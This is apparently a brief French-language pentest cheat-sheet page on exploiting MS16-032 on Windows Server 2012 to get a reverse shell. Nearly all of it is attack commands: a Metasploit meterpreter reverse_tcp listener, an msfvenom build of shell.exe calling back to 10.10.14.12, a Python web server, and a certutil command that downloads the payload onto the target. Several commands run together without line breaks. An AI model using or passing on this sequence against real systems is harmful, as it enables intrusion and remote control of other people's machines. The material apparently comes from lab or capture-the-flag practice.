Windows Server 2012 (Kernel Exploitation)
Kernel Explotation:
Reverse Shell via Metasploit

Exploitation Vulnérabilité MS16-032



Mis à jour




Mis à jour
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.12
set LPORT 4444
exploit -jmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=4444 -f exe -o shell.exepython3 -m http.servercertutil.exe -f -urlcache -split http://10.10.14.12:8000/shell.exe